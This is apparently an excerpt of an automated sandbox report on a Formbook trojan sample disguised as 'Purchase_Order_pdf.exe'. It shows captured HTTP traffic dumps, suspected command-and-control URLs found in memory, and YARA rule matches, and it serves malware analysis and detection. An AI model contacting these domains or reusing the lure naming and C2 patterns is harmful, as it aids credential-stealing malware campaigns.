        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Oct 2024 03:57:35 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Oct 2024 03:57:38 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 03:57:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 03:57:46 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 03:57:49 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 03:57:51 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 30 Oct 2024 03:59:07 GMTContent-Type: text/html; charset=utf-8Content-Length: 555Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.0</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 30 Oct 2024 03:59:09 GMTContent-Type: text/html; charset=utf-8Content-Length: 555Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.0</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 30 Oct 2024 03:59:12 GMTContent-Type: text/html; charset=utf-8Content-Length: 555Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.0</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 30 Oct 2024 03:59:15 GMT Content-Type: text/html; charset=utf-8 Content-Length: 555 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.0</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page -->
        Source: rasdial.exe, 00000005.00000002.4486451389.00000000058EA000.00000004.10000000.00040000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000007.00000002.4485691853.000000000335A000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://patioprojex.africa/iv79/?vxPD=aYGuHzYMPqEvnYXTlDqrzWS6BBG
        Source: hEtOKWgxZfeL.exe, 00000007.00000002.4487012045.0000000004F46000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.lanxuanz.tech
        Source: hEtOKWgxZfeL.exe, 00000007.00000002.4487012045.0000000004F46000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.lanxuanz.tech/1q08/
        Source: rasdial.exe, 00000005.00000003.2609525103.00000000079BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: rasdial.exe, 00000005.00000003.2609525103.00000000079BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: rasdial.exe, 00000005.00000003.2609525103.00000000079BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
        Source: rasdial.exe, 00000005.00000003.2609525103.00000000079BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: rasdial.exe, 00000005.00000003.2609525103.00000000079BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: rasdial.exe, 00000005.00000003.2609525103.00000000079BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: rasdial.exe, 00000005.00000003.2609525103.00000000079BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: rasdial.exe, 00000005.00000002.4486451389.00000000055C6000.00000004.10000000.00040000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000007.00000002.4485691853.0000000003036000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://jino.ru
        Source: rasdial.exe, 00000005.00000002.4484702585.0000000000AF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
        Source: rasdial.exe, 00000005.00000002.4484702585.0000000000B15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
        Source: rasdial.exe, 00000005.00000002.4484702585.0000000000AF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
        Source: rasdial.exe, 00000005.00000002.4484702585.0000000000B15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
        Source: rasdial.exe, 00000005.00000002.4484702585.0000000000AF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
        Source: rasdial.exe, 00000005.00000002.4484702585.0000000000AF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
        Source: rasdial.exe, 00000005.00000003.2604993632.000000000799F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
        Source: rasdial.exe, 00000005.00000002.4486451389.00000000060C4000.00000004.10000000.00040000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000007.00000002.4485691853.0000000003B34000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.bayarcepat19.click/g48c/?vxPD=u4dxImDz3hiCSE5hJ4yjIETlrN4hPhRObI6eehslCZThPKRDqwNE0F1xdz
        Source: rasdial.exe, 00000005.00000003.2609525103.00000000079BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
        Source: rasdial.exe, 00000005.00000002.4486451389.00000000063E8000.00000004.10000000.00040000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000007.00000002.4485691853.0000000003E58000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.galaxyslot88rtp.lat/sfat/?7JH=bvSPlHnHQ4A&vxPD=ndQRUSq53iSLxvb8OFWfwTz47wZn0JkOZeX5JGA9k
        Source: rasdial.exe, 00000005.00000003.2609525103.00000000079BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

        E-Banking Fraud

        Source: Yara match File source: 00000002.00000002.2433455475.00000000087B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000005.00000002.4485573273.0000000000DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000005.00000002.4484572757.0000000000A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000007.00000002.4487012045.0000000004EF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000002.00000002.2428914356.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000004.00000002.4485613681.0000000002F80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000005.00000002.4485647007.0000000000E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000002.00000002.2429698099.0000000003BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        System Summary

        Source: 00000002.00000002.2433455475.00000000087B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.4485573273.0000000000DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.4484572757.0000000000A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000007.00000002.4487012045.0000000004EF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000002.00000002.2428914356.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.4485613681.0000000002F80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.4485647007.0000000000E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000002.00000002.2429698099.0000000003BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: initial sample Static PE information: Filename: Purchase_Order_pdf.exe
        Source: Purchase_Order_pdf.exe, 00000000.00000003.2047798166.000000000488D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Purchase_Order_pdf.exe
        Source: Purchase_Order_pdf.exe, 00000000.00000003.2048908669.00000000046E3000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Purchase_Order_pdf.exe
        Source: Purchase_Order_pdf.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
